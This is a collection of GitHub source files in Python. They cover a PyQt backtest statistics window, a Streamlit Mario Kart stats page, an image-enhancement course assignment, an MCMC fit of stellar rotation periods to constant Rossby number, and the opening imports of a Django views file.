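{"seq_id":"42712867494","text":"from PyQt5.QtWidgets import *\nfrom GUI.BaseComponents.SymbolList import SymbolList\nfrom GUI.BaseComponents.TimeframeList import TimeframeList\nfrom GUI.BacktestWindow.BacktestWindow import getAllSubClassesOfAbstractClass\nfrom Statistics.Statistics import Statistics\nimport os\nimport inspect\nimport importlib\nfrom collections import OrderedDict\nfrom Statistics.Main_Statistics import load_data\nfrom GUI.StatisticsWindow.VariableList import VariableList\nimport Constants\n\n\nclass StatisticsWindow(QWidget):\n    def __init__(self):\n        super().__init__()\n\n        self.layout = QVBoxLayout()\n\n        self.strategyLayout = QHBoxLayout()\n        self.strategyComboBox = QComboBox()\n\n        self.universeLayout = QHBoxLayout()\n        self.symbolList = SymbolList()\n        self.timeframeList = TimeframeList()\n\n        self.dateLayout = QHBoxLayout()\n        self.startDateField = QDateEdit()\n        self.endDateField = QDateEdit()\n\n        self.statisticsLayout = QHBoxLayout()\n        self.statisticsComboBox = QComboBox()\n        self.statisticsParameters = []\n\n        self.controleLayout = QHBoxLayout()\n        self.saveNameField = QLineEdit()\n        self.saveButton = QPushButton()\n\n        self.initLayout()\n\n    def initLayout(self):\n        self.initStrategyLayout()\n        self.initUniverseLayout()\n        self.initDateLayout()\n        self.initStatisticsLayout()\n        self.initControleLayout()\n\n        self.layout.addLayout(self.strategyLayout)\n        self.layout.addLayout(self.universeLayout)\n        self.layout.addLayout(self.dateLayout)\n        self.layout.addLayout(self.statisticsLayout)\n        self.layout.addLayout(self.controleLayout)\n\n        self.setLayout(self.layout)\n\n    def initStrategyLayout(self):\n        self.strategyComboBox.setToolTip(\"Strategy\")\n        folders = [f for f in os.listdir(Constants.STATISTICS_DIRECTORY[:-1]) if os.path.isdir(Constants.STATISTICS_DIRECTORY + f)]\n        self.strategyComboBox.addItems(folders)\n        self.strategyComboBox.currentTextChanged.connect(self.strategyChanged)\n\n        self.strategyLayout.addWidget(self.strategyComboBox)\n\n    def initDateLayout(self):\n        self.startDateField.setDisplayFormat(\"yyyy-MM-dd\")\n        self.endDateField.setDisplayFormat(\"yyyy-MM-dd\")\n\n        self.startDateField.setToolTip(\"StartDate\")\n        self.endDateField.setToolTip(\"EndDate\")\n\n        self.dateLayout.addWidget(self.startDateField)\n        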
self.dateLayout.addWidget(self.endDateField)\n\n def initUniverseLayout(self):\n self.universeLayout.addWidget(self.symbolList)\n self.universeLayout.addWidget(self.timeframeList)\n\n def initStatisticsLayout(self):\n self.statisticsComboBox.setToolTip(\"Statistics\")\n self.statisticsComboBox.addItems(getAllSubClassesOfAbstractClass(\"Statistics\", Statistics))\n self.statisticsComboBox.currentTextChanged.connect(self.statisticChanged)\n\n self.statisticsLayout.addWidget(self.statisticsComboBox)\n\n def statisticChanged(self):\n module = importlib.import_module(\"Statistics.\" + self.statisticsComboBox.currentText())\n parameters = OrderedDict\n for name, obj in inspect.getmembers(module):\n if name == self.statisticsComboBox.currentText():\n parameters = inspect.signature(obj).parameters\n\n for widget in self.statisticsParameters:\n self.statisticsLayout.removeWidget(widget)\n self.statisticsParameters = []\n\n for param, value in parameters.items():\n if param == \"df\":\n continue\n elif param == \"variable_list\":\n widget = VariableList(Constants.STATISTICS_DIRECTORY + self.strategyComboBox.currentText() + \"\\\\\" +\n self.symbolList.data[0] + \"\\\\Trades.csv\")\n else:\n widget = QLineEdit()\n widget.setToolTip(param)\n if value.default is not inspect.Parameter.empty and value.default is not None:\n widget.setText(str(value.default))\n self.statisticsParameters.append(widget)\n self.statisticsLayout.addWidget(widget)\n\n def initControleLayout(self):\n self.saveNameField.setToolTip(\"SaveName\")\n self.saveButton.setText(\"Save\")\n self.saveButton.clicked.connect(self.save)\n\n self.controleLayout.addWidget(self.saveNameField)\n self.controleLayout.addWidget(self.saveButton)\n\n def save(self):\n # Add start, end date to load data\n # Get indicator list\n for symbol in self.symbolList.getSelectedRows():\n for timeframe in self.timeframeList.getSelectedRows():\n params = (load_data(self.strategyComboBox.currentText(), symbol, timeframe, []),)\n for widget in self.statisticsParameters:\n if isinstance(widget, QLineEdit):\n params = params + (widget.text(),)\n elif isinstance(widget, VariableList):\n variableList = [[a, b] for a, b in zip(widget.getSelectedRows(1, 0), widget.getSelectedRows(1, 2))]\n params = params + (variableList,)\n else:\n print(\"Data of \" + str(type(widget)) + \" can not be read\")\n\n mymodule = importlib.import_module(\"Statistics.\" + self.statisticsComboBox.currentText())\n classObject = getattr(mymodule, self.statisticsComboBox.currentText())\n\n instance = classObject(*params)\n\n instance.plot_results(self.saveNameField.text())\n\n def strategyChanged(self):\n self.universeLayout.removeWidget(self.symbolList)\n self.universeLayout.removeWidget(self.timeframeList)\n\n symbols = [f for f in os.listdir(Constants.STATISTICS_DIRECTORY + self.strategyComboBox.currentText()) if\n os.path.isdir(Constants.STATISTICS_DIRECTORY + self.strategyComboBox.currentText() + \"\\\\\" + f)]\n self.symbolList = SymbolList(symbols)\n\n self.universeLayout.addWidget(self.symbolList)\n self.universeLayout.addWidget(self.timeframeList)\n","repo_name":"Potti1234/ED_Backtester","sub_path":"GUI/StatisticsWindow/StatisticsWindow.py","file_name":"StatisticsWindow.py","file_ext":"py","file_size_in_byte":6112,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"14664194525","text":"import streamlit as st\nimport pandas as pd\n\n\n\nst.markdown(\"# Racer Page 🎈\")\nst.sidebar.markdown(\"# This is Racer Page 🎈\")\nst.write(' # 
Mariokart *Stats Website*')\n\nlink = \"\"\"Back to BI Site \"\"\"\nst.markdown(link, unsafe_allow_html=True)\n\ndf_racer = pd.read_csv('data/racer_stats.csv')\nst.write(df_racer)\nst.dataframe(df_racer.style\n.highlight_max(color='lightgreen', axis=0,subset=['Speed','Acceleration','Weight'])\n.highlight_min(color='red', axis=0,subset=['Speed','Acceleration','Weight'] )\n)\nst.line_chart(df_racer,x='Speed',y=['Acceleration','Weight','Handling','Traction/Grip','Mini-Turbo'])\n\nst.header(\"Racer Speed doesn't seem to correlate to number of races they win\")\nx = st.slider('How Many Racers to Show',1,len(df_racer))\nst.write(\"Racers by Speed\")\ndf_fastest_Racers = df_racer[['Character','Speed']].sort_values(\"Speed\",ascending=False).iloc[0:x]\nst.dataframe(df_fastest_Racers)\ncharacter_dictionary = {'Mario' : 'Crowd favorite', 'Luigi' : 'Just a Green Mario'}\n\n\nleft_column_1, right_column_1 = st.columns(2)\nwith left_column_1:\n    st.write(\"Racers by Speed\")\n    df_fastest_Racers = df_racer[['Character','Speed']].sort_values(\"Speed\",ascending=False).iloc[0:x]\n    st.dataframe(df_fastest_Racers)\nwith right_column_1:\n    # Bring in Variable Table for percent won\n    st.write(\"Racers by Win Percent\")\n    df_best = df_racer[['Character','Times First Place','Total Races']].copy()  # copy to avoid SettingWithCopyWarning\n    df_best['Win Percent'] = df_best['Times First Place'] / df_best['Total Races'] * 100\n    df_best = df_best[['Character', 'Win Percent']].sort_values('Win Percent',ascending=False).iloc[0:x]\n    st.dataframe(df_best)\n\nst.header(\"Individual Racer Stats\")\n\nleft_column_2, right_column_2 = st.columns(2)\n\nchosen = st.selectbox('Pick a Character', df_racer['Character'])","repo_name":"tylerbarty/TylersWebsite","sub_path":"racer_stats.py","file_name":"racer_stats.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"19238555659","text":"#!/usr/bin/env python\n\n'''\nImage Processing course assignment 1.\n\nUniversity of São Paulo (USP)\nInstitute of Mathematics and Computing Sciences (ICMC)\nSCC0251 - Image Processing 2023.1\nAssignment 1: enhancement and super-resolution\nLucas Xavier Leite, USP number: 10783347\n\nTask\n----\nIn this assignment you have to implement 3 distinct image enhancement\ntechniques, as well as a super-resolution method based on multiple views of the\nsame image.\n'''\n\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport imageio.v3 as iio\n\nDEBUG = False\nGRAY_LEVELS = 256\n\n\ndef main():\n    filename = input()\n    ref_image = input()\n    option = int(input())\n    gamma = float(input())\n\n    images = np.array([iio.imread(file)\n                       for file in sorted(glob.glob(f'{filename}*.png'))])\n\n    if option == 1:\n        images = single_histogram_equalization(images)\n    elif option == 2:\n        images = joint_histogram_equalization(images)\n    elif option == 3:\n        images = gamma_correction(images, gamma)\n\n    H_hat = super_resolution(images)\n    H_ref = iio.imread(ref_image)\n\n    print(f'{round(rmse(H_ref, H_hat), 4):.4f}')\n\n\ndef histogram(image, levels):\n    '''\n    Compute an image histogram.\n\n    Parameters\n    ----------\n    image : array-like\n        The image from which to obtain the histogram.\n    levels : int\n        Number of gray levels to consider when counting frequencies.\n\n    Returns\n    -------\n    numpy.ndarray\n        The histogram of ``image``.\n    '''\n    h = np.zeros(levels).astype(int)\n\n    for i in range(levels):\n        h[i] = np.sum(image == i)\n\n    return h
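\n\n# Worked example (illustrative, not part of the original assignment): for the 2x2\n# image [[0, 1], [1, 3]] with levels=4, histogram counts one 0, two 1s, no 2 and one 3:\n#   histogram(np.array([[0, 1], [1, 3]]), 4) -> array([1, 2, 0, 1])\n# and the corresponding cumulative histogram (see below) is [1, 3, 3, 4].\n\n\ndef cumulative_histogram(image, levels):\n    '''\n    Compute a cumulative image 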
histogram.\n\n Parameters\n ----------\n image : array-like\n The image from which to obtain the cumulative histogram.\n levels : int\n Number of gray levels to consider when counting frequencies.\n\n Returns\n -------\n numpy.ndarray\n The cumulative histogram of ``image``.\n '''\n h = histogram(image, levels)\n\n hc = np.zeros(levels).astype(int)\n hc[0] = h[0]\n\n for i in range(1, levels):\n hc[i] = h[i] + hc[i-1]\n\n return hc\n\n\ndef joint_cumulative_histogram(images, levels):\n '''\n Compute a joint cumulative image histogram using the images mean values.\n\n Parameters\n ----------\n images : array-like\n The images from which to obtain the joint cumulative histogram.\n levels : int\n Number of gray levels to consider when counting frequencies.\n\n Returns\n -------\n numpy.ndarray\n The joint cumulative histogram of ``images``.\n '''\n jh = np.mean([histogram(img, levels) for img in images], axis=0)\n\n if DEBUG is True:\n print([histogram(i, levels) for i in images])\n print(jh)\n\n jhc = np.zeros(levels).astype(int)\n jhc[0] = jh[0]\n\n for i in range(1, levels):\n jhc[i] = jh[i] + jhc[i-1]\n\n return jhc\n\n\ndef histogram_equalization(image, levels, cumulative_histogram):\n '''\n Equalize an image histogram.\n\n Parameters\n ----------\n image : array-like\n The image whose histogram to equalize.\n levels : int\n Number of gray levels to consider when counting frequencies.\n cumulative_histogram : array-like\n Cumulative histogram of ``image``.\n\n Returns\n -------\n s : numpy.ndarray\n The equalized histogram of ``image``.\n T : numpy.ndarray\n The transformation applied.\n '''\n s = np.zeros(image.shape).astype(np.uint8)\n T = np.zeros(levels).astype(np.uint8)\n\n N, M = image.shape\n\n for z in range(levels):\n si = ((levels - 1) / float(M * N)) * cumulative_histogram[z]\n s[np.where(image == z)] = si\n T[z] = si\n\n return (s, T)\n\n\ndef single_histogram_equalization(images):\n '''\n Perform histogram equalization on a set of images.\n\n Parameters\n ----------\n images : array-like\n The images to be enhanced using histogram equalization.\n\n Returns\n -------\n numpy.ndarray\n The enhanced images.\n '''\n if DEBUG is True:\n fig, ax = plt.subplots(images.shape[0], 5, figsize=(3, 3))\n\n images_eq = np.zeros(images.shape)\n\n for i, img in enumerate(images):\n hc = cumulative_histogram(img, GRAY_LEVELS)\n img_eq, T = histogram_equalization(img, GRAY_LEVELS, hc)\n images_eq[i] = img_eq\n\n if DEBUG is True:\n print(f'\\n{i}:\\n')\n print(img_eq)\n print_debug(ax, i, img, img_eq, T)\n\n if DEBUG is True:\n plt.show()\n\n return images_eq\n\n\ndef joint_histogram_equalization(images):\n '''\n Perform histogram equalization on a set of images, using a joint histogram.\n\n The same joint cumulative histogram is used to equalize the whole set of\n image histograms, instead of using each image's own histogram.\n\n Parameters\n ----------\n images : array-like\n The images to be enhanced.\n\n Returns\n -------\n numpy.ndarray\n The enhanced images.\n '''\n if DEBUG is True:\n fig, ax = plt.subplots(images.shape[0], 5, figsize=(3, 3))\n\n jhc = joint_cumulative_histogram(images, GRAY_LEVELS)\n\n images_eq = np.zeros(images.shape)\n\n for i, img in enumerate(images):\n img_eq, T = histogram_equalization(img, GRAY_LEVELS, jhc)\n images_eq[i] = img_eq\n\n if DEBUG is True:\n print(f'\\n{i}:\\n')\n print(img_eq)\n print_debug(ax, i, img, img_eq, T)\n\n if DEBUG is True:\n plt.show()\n\n return images_eq\n\n\ndef gamma_correction_single(image, gamma):\n '''\n Perform gamma 
correction on a single image.\n\n    Parameters\n    ----------\n    image : array-like\n        The image to be enhanced.\n    gamma : float\n        The gamma correction factor.\n\n    Returns\n    -------\n    numpy.ndarray\n        The enhanced image.\n    '''\n    output = image.copy()\n    max_value = float(GRAY_LEVELS - 1)\n\n    for x in range(output.shape[0]):\n        for y in range(output.shape[1]):\n            output[x][y] = (max_value * ((output[x][y] / max_value)\n                                         ** (1 / gamma))).astype(np.uint8)\n\n    return output\n\n\ndef gamma_correction(images, gamma):\n    '''\n    Perform gamma correction on a set of images.\n\n    Parameters\n    ----------\n    images : array-like\n        The images to be enhanced.\n    gamma : float\n        The gamma correction factor.\n\n    Returns\n    -------\n    numpy.ndarray\n        The enhanced images.\n    '''\n    if DEBUG is True:\n        fig, ax = plt.subplots(images.shape[0], 4, figsize=(3, 3))\n\n    G = np.array([gamma_correction_single(img, gamma) for img in images])\n\n    if DEBUG is True:\n        for i, (img, gi) in enumerate(zip(images, G)):\n            print(f'\\nOriginal ({i}):\\n')\n            print(img)\n            print(f'\\nCorrected ({i}):\\n')\n            print(gi)\n            print_debug(ax, i, img, gi)\n\n        plt.show()\n\n    return G\n\n\ndef super_resolution(images):\n    '''\n    Use a set of low resolution images to compose one of higher resolution.\n\n    Parameters\n    ----------\n    images : array-like\n        The set of low resolution images.\n\n    Returns\n    -------\n    numpy.ndarray\n        The higher resolution image.\n    '''\n    assert images.shape[0] == 4\n\n    N, M = images[0].shape\n\n    H = np.zeros((N * 2, M * 2))\n\n    H[::2, ::2] = images[0]\n    H[::2, 1::2] = images[1]\n    H[1::2, ::2] = images[2]\n    H[1::2, 1::2] = images[3]\n\n    if DEBUG is True:\n        print(f'{images[0].shape} -> {H.shape}\\n')\n        print('L[0]:\\n')\n        print(images[0])\n\n        print('\\nL[1]:\\n')\n        print(images[1])\n\n        print('\\nL[2]:\\n')\n        print(images[2])\n\n        print('\\nL[3]:\\n')\n        print(images[3])\n\n        print('\\nH:\\n')\n        print(H)\n\n        plt.imshow(images[0], cmap='gray')\n        plt.axis('off')\n        plt.show()\n\n        plt.imshow(H, cmap='gray')\n        plt.axis('off')\n        plt.show()\n\n    return H\n\n\ndef rmse(reference, image):\n    '''\n    Calculate the root mean squared error of two images.\n\n    Parameters\n    ----------\n    reference : array-like\n        The reference image.\n    image : array-like\n        The image to compare against the reference image.\n\n    Returns\n    -------\n    float\n        The root mean squared error.\n    '''\n    return np.sqrt(np.square(reference - image).mean())
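\n\n# Worked example (illustrative, not part of the original assignment): super_resolution\n# interleaves the four low-resolution views on a 2x2 grid, so for the 1x1 inputs\n# L = [[[0]], [[1]], [[2]], [[3]]]:\n#   super_resolution(np.array(L)) -> [[0., 1.], [2., 3.]]\n# and rmse(H, H) is 0 for any image H.\n\n\ndef print_debug(ax, row, original_image, enhanced_image, transformation=None):\n    '''\n    Print info and plot graphs for debugging.\n\n    This function considers a fixed number of columns (4 or 5) for plotting,\n    and plots all graphs in a single row, i.e., this function should be called\n    once for each row. After calling this function for the last row,\n    matplotlib.pyplot.show should be called.\n\n    The plots include both the original input image and the enhanced image, as\n    well as their histograms and the transformation function - when using the\n    `transformation` optional parameter.\n\n    Parameters\n    ----------\n    ax : array-like\n        2D array of `matplotlib.axes.Axes` used for plotting. 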
The number of\n        columns may only be 4 or 5 (5 to include the plot of `transformation`).\n    row : int\n        Subplot row number.\n    original_image : array-like\n        The original input image, without any enhancement.\n    enhanced_image : array-like\n        The enhanced image.\n    transformation : array-like\n        The transformation function applied to the image.\n    '''\n    h = histogram(original_image, GRAY_LEVELS)\n    heq = histogram(enhanced_image, GRAY_LEVELS)\n\n    ax[row][0].imshow(original_image, cmap='gray')\n    ax[row][0].axis('off')\n\n    ax[row][1].bar(range(GRAY_LEVELS), h)\n    ax[row][1].set_xlabel('Graylevel / intensity')\n    ax[row][1].set_ylabel('Frequency')\n\n    ax[row][2].imshow(enhanced_image, cmap='gray')\n    ax[row][2].axis('off')\n\n    ax[row][3].bar(range(GRAY_LEVELS), heq)\n    ax[row][3].set_xlabel('Graylevel / intensity')\n    ax[row][3].set_ylabel('Frequency')\n\n    if transformation is not None:\n        ax[row][4].plot(range(GRAY_LEVELS), transformation)\n        ax[row][4].set_xlabel('Input pixel value')\n        ax[row][4].set_ylabel('Output pixel value')\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"lucasxavierleite/dip","sub_path":"Assignment 1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"969711268","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport paths\nimport numpy as np\nimport pandas as pd\n\nfrom astropy.table import Table\nimport emcee\nimport corner\nfrom scipy.optimize import curve_fit\nfrom multiprocessing import Pool\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\n\nmpl.rcParams[\"figure.dpi\"] = 100\nmpl.rcParams[\"savefig.bbox\"] = \"tight\"\nmpl.rcParams[\"savefig.dpi\"] = 300\n\nimport seaborn as sns\n\nsns.set(\n    context=\"paper\",\n    style=\"ticks\",\n    font_scale=1.2,\n    palette=\"colorblind\"\n    )\n\n\n######################################################################################\n#McQuillan et al. 2013\nmcq_koi = Table.read(\"https://cdsarc.cds.unistra.fr/ftp/J/ApJ/775/L11/table1.dat\",\n                readme=\"https://cdsarc.cds.unistra.fr/ftp/J/ApJ/775/L11/ReadMe\",\n                format=\"ascii.cds\")\nmcq_koi = mcq_koi.to_pandas()\nmcq_koi = mcq_koi.add_prefix('mcq_')\n\n\n#McQuillan et al. 2014\nmcq = pd.read_parquet(paths.data / 'mcquillan2014_table1.parquet')\n######################################################################################\n\n\n######################################################################################\n# California-Kepler Survey (Fulton & Petigura 2018)\n# This data table has been augmented with data from other surveys (see David et al. 
2021)\ncks = pd.read_parquet(paths.data / 'cks_merged.parquet')\n# The dataframe has a row entry for each KOI, meaning individual stars are represented N times\n# where N is the number of KOIs detected around that star, so we drop duplicates.\ncks = cks.drop_duplicates(subset=['kepid'], keep='first')\ncks = cks.merge(mcq_koi, how='left', left_on='kepid', right_on='mcq_KIC')\n######################################################################################\n\n\n######################################################################################\n# LAMOST-Kepler \nlam = pd.read_parquet(paths.data / 'kepler_lamost.parquet')\n\n# Drop duplicate sources, keeping the one with the brighter G magnitude\nlam = lam.sort_values([\"KIC\", \"Gmag\"], ascending = (True, True))\nlam = lam.merge(mcq, how='left', left_on=\"KIC\", right_on=\"mcq_KIC\")\nlam = lam.drop_duplicates(subset=['KIC'], keep='first')\n\nlam_mask = (lam[\"Teff_lam\"]>3000)\nlam_mask &= (lam[\"Teff_lam\"]<8000)\nlam_mask &= (lam[\"logg_lam\"]>4)\nlam_mask &= (lam[\"logg_lam\"]<5)\nlam_mask &= (abs(lam[\"feh_lam\"])<2)\nlam = lam[lam_mask]\n######################################################################################\n\n\n######################################################################################\ndef convective_turnover_timescale(teff): \n    #Returns convective turnover timescale in days \n    #Gunn et al. 1998 relation, from Cranmer & Saar 2011\n    return 314.24*np.exp( -(teff/1952.5) - (teff/6250.)**18. ) + 0.002\n    \ndef constant_rossby(teff, ro):\n    #Return locus of rotation periods corresponding to constant Rossby number\n    return ro * convective_turnover_timescale(teff)\n\nlam[\"Ro\"] = lam[\"Prot\"]/convective_turnover_timescale(lam[\"Teff_lam\"]) \n######################################################################################\n\n    \ndef percentile_bootstrap(nsamples=100, \n                         f=0.5, \n                         pctl=90.):\n\n    # nsamples : number of bootstrap resamplings to perform\n    # f : fraction of data to resample (with replacement) in each bin\n    # pctl : percentile to compute\n    \n    _teff = np.linspace(4000,7500,1000)\n    teff_bin_centers = np.arange(4000,7020,20)\n    \n    per_pctl = np.zeros(len(teff_bin_centers))\n    per_pctl_err = np.zeros(len(teff_bin_centers))\n    \n    for i, tc in enumerate(teff_bin_centers):\n        arg = (abs(lam[\"Teff_lam\"]-tc)<100) & (lam[\"Ro\"]<5/3)\n        pctl_arr = []\n        \n        for n in range(nsamples):\n            _x = np.array(lam[\"Prot\"][arg])\n            pctl_arr.append(np.nanpercentile(_x[np.random.choice(len(_x), int(f*len(_x)), replace=True)], pctl))\n        \n        per_pctl[i] = np.mean(pctl_arr)\n        per_pctl_err[i] = np.std(pctl_arr)    \n    \n    \n    return teff_bin_centers, per_pctl, per_pctl_err\n    \nteff_bin_centers, period_90th_pctl, e_period_90th_pctl = percentile_bootstrap(pctl=90.)\nteff_bin_centers, period_10th_pctl, e_period_10th_pctl = percentile_bootstrap(pctl=10.) 
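\n\n# Quick sanity check (illustrative, not part of the original script): for roughly\n# solar values (Teff ~ 5772 K, Prot ~ 25.4 d), the turnover time from the Gunn et al.\n# relation above is ~13 d, so the implied Rossby number is\n# 25.4 / convective_turnover_timescale(5772)  # ~ 2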
\n\n\n############################################\ncks_teff = cks[\"p20_cks_steff\"]\ncks_e_teff = cks[\"p20_cks_steff_err1\"]\ncks_prot = cks[\"d21_prot\"]\n\ndef ridge_hi(teff):\n    m = (2-24)/(6500-5800)\n    b = (2 - m*6500) \n    return m*teff + b\n\ndef ridge_lo(teff):\n    m = (2-24)/(6500-5800)\n    b = (-5 - m*6500) \n    return m*teff + b\n\nmask = (cks['p20_cks_slogg']>4) #main sequence\nridge = (cks['p20_cks_steff']>5850)\nridge &= (cks['p20_cks_steff']<6500)\nridge &= (cks['d21_prot'] < ridge_hi(cks['p20_cks_steff']))\nridge &= (cks['d21_prot'] > ridge_lo(cks['p20_cks_steff']))\nridge &= mask\n############################################\n\n\nlam_teff = lam[\"Teff_lam\"]\nlam_e_teff = lam[\"e_Teff_lam\"]\nlam_prot = lam[\"Prot\"]\n\nhall = Table.read(\"https://cdsarc.cds.unistra.fr/ftp/J/other/NatAs/5.707/table1.dat\",\n                readme=\"https://cdsarc.cds.unistra.fr/ftp/J/other/NatAs/5.707/ReadMe\",\n                format=\"ascii.cds\")\n\nx_lam = np.ascontiguousarray(teff_bin_centers, dtype=np.float64)\ny_lam = np.ascontiguousarray(period_90th_pctl, dtype=np.float64)\n\nx_cks = np.ascontiguousarray(cks_teff[ridge], dtype=np.float64)\ny_cks = np.ascontiguousarray(cks_prot[ridge], dtype=np.float64)\n\nhall_ms = (hall[\"Type\"] == \"MS\") #& (hall[\"Teff\"]>5800)\nx_hal = np.ascontiguousarray(hall[\"Teff\"][hall_ms], dtype=np.float64) \ny_hal = np.ascontiguousarray(hall[\"P\"][hall_ms], dtype=np.float64)\n\n\ndef constant_rossby_sampler(x, y, yerr,\n                            teff_min=5000, \n                            teff_max=6250,\n                            ndraws=5000, \n                            trace_plot=True,\n                            corner_plot=True):\n    \n    m = (np.isfinite(x)) & (np.isfinite(y)) & (x>teff_min) & (x < teff_max)\n    x, y, yerr = x[m], y[m], yerr[m]\n\n    # Model: P = Ro * tau(Teff), with a fractional jitter term f that inflates\n    # the uncertainties as sigma^2 = yerr^2 + (f*model)^2\n    def log_probability(theta, x, y, yerr):\n        ro, f = theta\n        if not (0 < ro < 10) or not (0 < f < 1):\n            return -np.inf\n        model = constant_rossby(x, ro)\n        sigma2 = yerr**2 + model**2 * f**2\n        return -0.5 * np.sum((y - model)**2 / sigma2 + np.log(sigma2))\n\n    # Initialize the walkers around a least-squares estimate of Ro\n    popt, pcov = curve_fit(constant_rossby, x, y, p0=[1.])\n    pos = np.array([popt[0], 0.1]) + 1e-4 * np.random.randn(32, 2)\n    nwalkers, ndim = pos.shape\n\n    with Pool() as pool:\n        sampler = emcee.EnsembleSampler(nwalkers, ndim, log_probability, args=(x, y, yerr), pool=pool)\n        sampler.run_mcmc(pos, ndraws, progress=True)\n\n    flat_samples = sampler.get_chain(discard=ndraws//2, flat=True)\n\n    if trace_plot:\n        fig, axes = plt.subplots(ndim, figsize=(10, 4), sharex=True)\n        samples = sampler.get_chain()\n        for i in range(ndim):\n            axes[i].plot(samples[:, :, i], \"k\", alpha=0.3)\n\n    if corner_plot:\n        corner.corner(flat_samples, labels=[\"Ro\", \"f\"])\n\n    return flat_samples\n\n\nx1 = np.copy(teff_bin_centers)\ny1 = np.copy(period_90th_pctl)\ny1err = np.copy(e_period_90th_pctl)\n\narg1 = (x1>5800) & (x1<6250)\nx1 = x1[arg1]\ny1 = y1[arg1]\ny1err = y1err[arg1]\n\n\nflat_samples_90 = constant_rossby_sampler(x = x1,\n                                          y = y1,\n                                          yerr = y1err,\n                                          teff_min = 5000,\n                                          teff_max = 6250)\n\nflat_samples_10 = constant_rossby_sampler(x = teff_bin_centers,\n                                          y = period_10th_pctl,\n                                          yerr = e_period_10th_pctl,\n                                          teff_min = 5000,\n                                          teff_max = 6250)
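\n\n# Posterior summary (illustrative, not part of the original script): a 68% credible\n# interval for the Rossby number of the 90th-percentile edge can be read off the\n# flattened chain, e.g.\n#   ro_lo, ro_med, ro_hi = np.percentile(flat_samples_90[:, 0], [16, 50, 84])\n\n\ndef rossby_plot(teff_bin_centers, flat_samples_10, flat_samples_90):\n    \n    y10 = period_10th_pctl\n    y90 = period_90th_pctl\n    \n    yerr10 = e_period_10th_pctl\n    yerr90 = e_period_90th_pctl\n    \n    ro10 = np.median(flat_samples_10[:,0])\n    ro90 = np.median(flat_samples_90[:,0])\n    \n    model_10 = constant_rossby(teff_bin_centers, ro10)\n    frac_resid_10 = 100*(y10-model_10)/y10\n    \n    fmed_10 = np.median(flat_samples_10[:,1])\n    sigma_10 = np.sqrt(yerr10**2 + model_10**2 * fmed_10**2)\n    \n    model_90 = constant_rossby(teff_bin_centers, ro90)\n    frac_resid_90 = 100*(y90-model_90)/y90\n    \n    fmed_90 = np.median(flat_samples_90[:,1])\n    sigma_90 = np.sqrt(yerr90**2 + model_90**2 * fmed_90**2)    \n    \n    sns.set(font_scale=1.4, context=\"paper\", style=\"ticks\")\n    sns.set_palette(\"Blues\")\n\n    teff_bin_centers = np.arange(4000,7020,20)    \n\n    fig = plt.figure(figsize=(6,8))\n    ax1 = plt.subplot2grid((5, 3), (0, 0), colspan=3, rowspan=2)\n    ax2 = plt.subplot2grid((5, 3), (2, 0), colspan=3, rowspan=2)\n    ax3 = plt.subplot2grid((5, 3), (4, 0), colspan=3, rowspan=1)\n\n\n    sns.kdeplot(\n        x=lam[\"Teff_lam\"], \n        y=lam[\"Prot\"], \n        fill=True, \n        bw_adjust=0.5,\n        ax=ax1\n    )\n\n    ax1.errorbar(teff_bin_centers, period_90th_pctl, yerr=e_period_90th_pctl, fmt='.', color='k', ms=6, alpha=0.9, label='90th percentile')\n    ax1.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='k', mfc='white', ms=6, alpha=0.9, label='10th percentile', lw=0.25)\n    ax1.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='white', mfc='white', ms=2, alpha=0.9, lw=0)\n    ax1.set_ylim(0,40)\n    ax1.legend()\n\n    _teff = 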
np.linspace(4000,7000,1000)\n\n\n for i,_ro in enumerate([3,ro90,0.75,ro10]):\n ax2.plot(_teff, constant_rossby(_teff, _ro), label='Ro = '+\"{:.2f}\".format(_ro), lw=3, alpha=1)\n\n\n ax2.errorbar(teff_bin_centers, period_90th_pctl, yerr=e_period_90th_pctl, fmt='.', color='k', ms=6, alpha=0.9)\n ax2.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='k', mfc='white', ms=6, alpha=0.9, lw=0.25)\n ax2.errorbar(teff_bin_centers, period_10th_pctl, yerr=e_period_10th_pctl, fmt='.', color='white', mfc='white', ms=2, alpha=0.9, lw=0)\n \n ax2.semilogy()\n ax2.set_ylim(0.1,100)\n ax2.set_yticks([0.1,1,10,100])\n ax2.set_yticklabels(['0.1','1','10','100'])\n ax2.legend()\n\n for ax in [ax1,ax2]:\n ax.set_xlabel(\"Effective temperature [K]\")\n ax.set_ylabel(\"Rotation period [d]\")\n ax.set_xlim(7000,4500) \n\n ax3.errorbar(teff_bin_centers, frac_resid_90, yerr=sigma_90, fmt='.', color='k', ms=6)\n ax3.errorbar(teff_bin_centers, frac_resid_10, yerr=sigma_10, fmt='.', color='k', mfc='white', ms=6) \n ax3.set_xlim(7000,4500)\n ax3.set_ylim(-50,50)\n ax3.axhline(0, color='k', ls='--')\n ax3.set_xlabel(\"Effective temperature [K]\")\n ax3.set_ylabel(\"Residuals [%]\")\n\n #sns.despine()\n plt.tight_layout()\n plt.savefig(paths.figures / 'mcmc.pdf')\n \n return\n\nrossby_plot(teff_bin_centers, flat_samples_10, flat_samples_90)\n\n\n\n","repo_name":"trevordavid/rossby-ridge","sub_path":"src/scripts/mcmc.py","file_name":"mcmc.py","file_ext":"py","file_size_in_byte":12261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"27159435597","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom signup.models import SignupCateringService, SignupMahalService, SignupCateringBoy, SignupCustomer\nfrom home_catboy.models import CBorders\nfrom django.core.paginator import PageNotAnInteger,Paginator,EmptyPage\nfrom .models import *\nimport uuid, json\nfrom datetime import time, datetime\nfrom django.template.defaulttags import register\nfrom django.core.files.storage import FileSystemStorage\nfrom django.views.decorators.cache import 